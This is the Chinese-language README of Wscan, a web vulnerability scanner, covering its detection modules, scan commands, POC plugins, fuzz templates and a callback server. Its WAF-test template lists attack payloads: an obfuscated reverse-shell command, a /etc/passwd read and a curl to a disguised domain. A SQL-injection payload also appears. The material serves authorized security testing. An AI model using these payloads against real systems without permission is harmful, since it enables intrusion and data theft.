未经事先双方同意,使用 Wscan 扫描目标是非法的。 Wscan 仅用于安全测试目的。 在使用之前, 请务必阅读并同意 License 文件中的条款,否则请勿安装使用本工具。
Wscan是一款专注于WEB安全的扫描器,它向Nmap致敬,而Nmap已经开源25年了。我们也计划在未来25年内持续更新Wscan,并将其持续开源。我们欢迎所有对web安全感兴趣的人一起加入我们的开发团队。
我们的目标是开发一款使用机器学习进行渗透测试的工具。与其他工具不同的是,我们的工具可以自动学习攻击和防御的模式,并根据具体的目标进行个性化的攻击。这样一来,我们的攻击效率和准确性将大大提高,同时也能降低误判的概率。
我们的工具采用了机器学习技术,实现了全自动化的Web渗透测试。这意味着无需手动添加和更新规则和签名,它能够自动学习和适应新的攻击模式和漏洞。
机器学习技术还能够快速处理大量的数据和流量,从而大幅提高测试效率和准确性。此外,它能够识别和发现一些人工难以察觉的漏洞和弱点,从而改善测试质量和可靠性。
我们相信,使用机器学习技术进行渗透测试,将是未来网络安全的一个重要方向。我们希望我们的工具能够帮助更多的人保障网络安全,为网络安全事业做出贡献。
检测模块 | Wscan | Xray | 说明 |
---|---|---|---|
xss |
√ | √ | 利用语义分析的方式检测XSS漏洞 |
sqldet |
√ | √ | 支持报错注入、布尔注入和时间盲注等 |
cmd-injection |
√ | √ | 支持 shell 命令注入、PHP 代码执行、模板注入等 |
dirscan |
√ | √ | 检测备份文件、临时文件、debug 页面、配置文件等10余类敏感路径和文件 |
path-traversal |
√ | √ | 支持常见平台和编码 |
xxe |
√ | √ | 支持有回显和反连平台检测 |
upload |
√ | √ | 支持常见的后端语言 |
brute-force |
√ | √ | 社区版支持检测 HTTP 基础认证和简易表单弱口令,内置常见用户名和密码字典 |
jsonp |
√ | √ | 检测包含敏感信息可以被跨域读取的 jsonp 接口 |
ssrf |
√ | √ | ssrf 检测模块,支持常见的绕过技术和反连平台检测 |
baseline |
√ | √ | 检测低 SSL 版本、缺失的或错误添加的 http 头等 |
redirect |
√ | √ | 支持 HTML meta 跳转、30x 跳转等 |
crlf-injection |
√ | √ | 检测 HTTP 头注入,支持 query、body 等位置的参数 |
xstream |
√ | √ | 检测XStream系列漏洞 |
struts |
√ | √ | 检测目标网站是否存在Struts2系列漏洞,包括s2-016、s2-032、s2-045、s2-059、s2-061等常见漏洞 |
thinkphp |
√ | √ | 检测ThinkPHP开发的网站的相关漏洞 |
shiro |
√ | √ | 检测Shiro反序列化漏洞 |
fastjson |
√ | √ | 检测fastjson系列漏洞 |
Nuclei YAML POC |
√ | × | Nuclei 标准的POC检测插件 |
Xray YAML POC |
√ | √ | Xray 标准的POC检测插件 |
Goby JSON POC |
√ | × | Gody 标准的POC检测插件 |
自定义FUZZ插件 |
√ | × | 对body、query中的参数进行模糊测试 |
Waf绕过/Waf测试 |
√ | × | 自定义各种特殊的Payload,测试Waf是否能拦截 |
WEB组件识别 |
√ | × | 识别网站应用的组件及相关技术 |
JavaScript敏感内容检测 |
√ | × | 识别JavaScript包含的AK/SK、ApiKey、电话、邮箱等敏感内容 |
⬇️下载地址 🏠最佳实践 👻WEB指纹插件编写指南 🎯WEB通用漏扫插件编写指南
配置漏扫插件、动态爬虫、静态爬虫代理
http:
proxy: "socks5://153.34.245.41:7777"
主动扫描,支持静态爬虫、动态爬虫、URL文件、单个URL等
Wscan首次运行时,将会生成一个名为config.yaml的文件。将plugins下面的所有插件的enabled设置为True。 如果要进行POC扫描,请先参考POC扫描配置,下载插件包并配置插件包路径。
./wscan --log-level=debug ws --basic-crawler http://testphp.vulnweb.com/ --json-output=wscan_scan_result.json --html-output=wscan_scan_result.html
./wscan --log-level=debug ws --browser http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
./wscan --log-level=debug ws --url http://testphp.vulnweb.com/listproducts.php?cat=1 --json-output=wscan_scan_result.json
./wscan --log-level=debug ws --url-file=/wscan/url_file.txt --html-output=wscan_scan_result.html
./wscan --log-level=debug ws -d "uname=111&pass=111" --url http://testphp.vulnweb.com/userinfo.php
在命令行中使用plug参数启用要扫描的插件
./wscan --log-level=debug ws --plug=sqldet --basic-crawler http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
仅记录爬虫结果,不进行漏洞扫描
./wscan --log-level=debug ws --browser http://testphp.vulnweb.com/ --no-scan --json-crawler-output=json_crawler_output.json
./wscan --log-level=debug ws --basic-crawler http://testphp.vulnweb.com/ --no-scan --json-crawler-output=json_crawler_output.json
运行genca命令之后,将在当前文件夹生成 ca.crt 和 ca.key 两个文件。
./wscan genca
安装CA的方法与XRAY一致,可以参考XRAY文档
在命令行中使用plug参数启用要扫描的插件
./wscan --log-level=debug ws --plug=sqldet,xss --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json
Wscan首次运行时,将会生成一个名为config.yaml的文件。将plugins下面的所有插件的enabled设置为True。 如果要进行POC扫描,请先参考POC扫描配置,下载插件包并配置插件包路径。
./wscan --log-level=debug ws --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json
Wscan不内置任何POC插件,但Wscan的prometheus插件引擎已支持Nuclei、XRAY、Goby 标准POC插件, 与其它扫描器不同的是Wscan可以自定义POC检测的深度,从而发现更多的Web安全问题。同时自动判断nuclei插件的扫描深度,将nuclei插件的扫描能力发挥到极致。
我们把下载的 X-ray 和 Nuclei 插件包放入同一个目录,并在配置文件中指定插件包的路径。
XRAY、Goby POC插件包下载地址
https://github.com/chaitin/xray/tree/master/pocs
Nuclei POC插件包下载地址
https://github.com/projectdiscovery/nuclei-templates/tree/main/http
Nuclei包含许多类型插件,只建议保存nuclei-templates-main/http中的插件,将其拷贝到wscan-poc目录中即可
Ⅰ. 同时扫描Nuclei、XRAY、Goby POC插件, 这种模式下只启用POC检测插件,不启用其它类型的插件
./wscan --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
./wscan --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url-file=/url_file.txt --html-output=wscan_scan_result.html
Ⅰ.运行方式与主被动扫描一致,但需要配置插件包路径, Wscan首次运行时,将会生成一个名为config.yaml的文件。您需要修改该文件中的以下内容,以指定include_poc的路径。
prometheus:
enabled: true
depth: 1 # 是探测深度, 默认为 1, 即只在 URL 深度为 0, 和深度为 1 时运行该插件
auto_load_poc: false
include_poc:
- /your_wscan_poc/wscan-poc/pocs/*
exclude_poc: []
不同于POC测试,自定义FUZZ插件,会对指定位置的参数进行FUZZ, 并支持自定义CEL表达式来验证是否存在漏洞
样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/custom/tmpl/
name: "custom-sqli"
set:
r1: randomInt(800000000, 1000000000)
payload:
- extractvalue(1,concat(char(126),md5({{r1}})))
placeholder:
- query
- body
- header
- cookie
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
您需要修改config.yaml文件中的以下内容,以指定custom的路径。
custom:
enabled: true
depth: 0
auto_load_tmpl: false
include_tmpl:
- /wscan/core/plugins/custom/tmpl/*.yml
exclude_tmpl: []
通过命令行启用--plug=waftest,即可对目标网站进行自定义Payload测试。
./wscan --log-level=debug ws --plug=custom --url http://testphp.vulnweb.com/listproducts.php?artist=1 --html-output=wscan_scan_result.html
不同于POC测试,Waf绕过/Waf测试插件,更注重的Payload,检测WAF阻断页面,
样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/waftest/tmpl/owasp
payload:
- $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
- /etc/passwd
- "`curl -L http://\u24BC\u24C4\u24C4\u24BC\u24C1\u24BA.\u24B8\u24C4\u24C2`"
encoder:
- URL
placeholder:
- URLParam
- HTMLForm
- HTMLMultipartForm
- JSONRequest
type: "RCE"
您需要修改config.yaml文件中的以下内容,以指定include_tmpl的路径。
waftest:
enabled: true
depth: 0
auto_load_tmpl: false
include_tmpl:
- /wscan/core/plugins/custom_tmpl/tmpl/owasp/*.yml
exclude_tmpl: [ ]
block_status_codes: # 被WAF阻止时HTTP状态码列表,默认值为403
- 403
pass_status_codes: # 未被WAF阻止时HTTP状态码列表, 默认值为200或404
- 200
- 404
block_regex: "" # 被WAF阻止网页的正则表达式
pass_regex: "" # 未被WAF阻止网页的正则表达式
non_blocked_as_passed: false
通过命令行启用--plug=waftest,即可对目标网站进行自定义Payload测试。
./wscan --log-level=debug ws --plug=custom_tmpl --browser http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
在进行漏洞检测的时候,我们会发现有很多的漏洞在执行了一些命令后,从表面上看没有任何回应的,比如命令执行漏洞,log4j rce,fastjson,ssrf等等, 但由于前端并没有对应的展示,导致我们并不能知道文件是否成功读取,那么当面对这类的漏洞,我们就需要一个反连平台, 通过让目标执行ping、curl等命令,对反连平台发起请求,反连平台在接受到请求后, 就能告诉我们,命令触发了,也就代表了漏洞存在了。
注意: Wscan支持http、dns、rmi、ldap四种返连类型,其中http、rmi、ldap复用同一个端口。
reverse:
db_file_path: "reverse.db"
token: "xxxx"
http:
enabled: true
listen_ip: 0.0.0.0
listen_port: ""
ip_header: ""
dns:
enabled: false
listen_ip: 0.0.0.0
domain: ""
is_domain_name_server: false
resolve:
- type: A
record: localhost
value: 127.0.0.1
ttl: 60
client:
remote_server: false
http_base_url: ""
dns_server_ip: ""
reverse:
token: "xxxx"
client:
remote_server: true
http_base_url: ""
dns_server_ip: ""
Wscan支持JSON、HTML等多种格式的扫描报告,其中包含详尽的漏洞验证逻辑。
Wscan的目标是创建一个开源且非盈利的项目。然而,由于Wscan的工作量庞大,代码仍在快速迭代中。 过早地进行开源可能导致各种各样的魔改版本涌现,这对工具的传播和项目未来的发展并不利。 因此,计划以Stars作为考量指标,分阶段分模块进行开源,以确保项目的稳健性和社区的有序参与。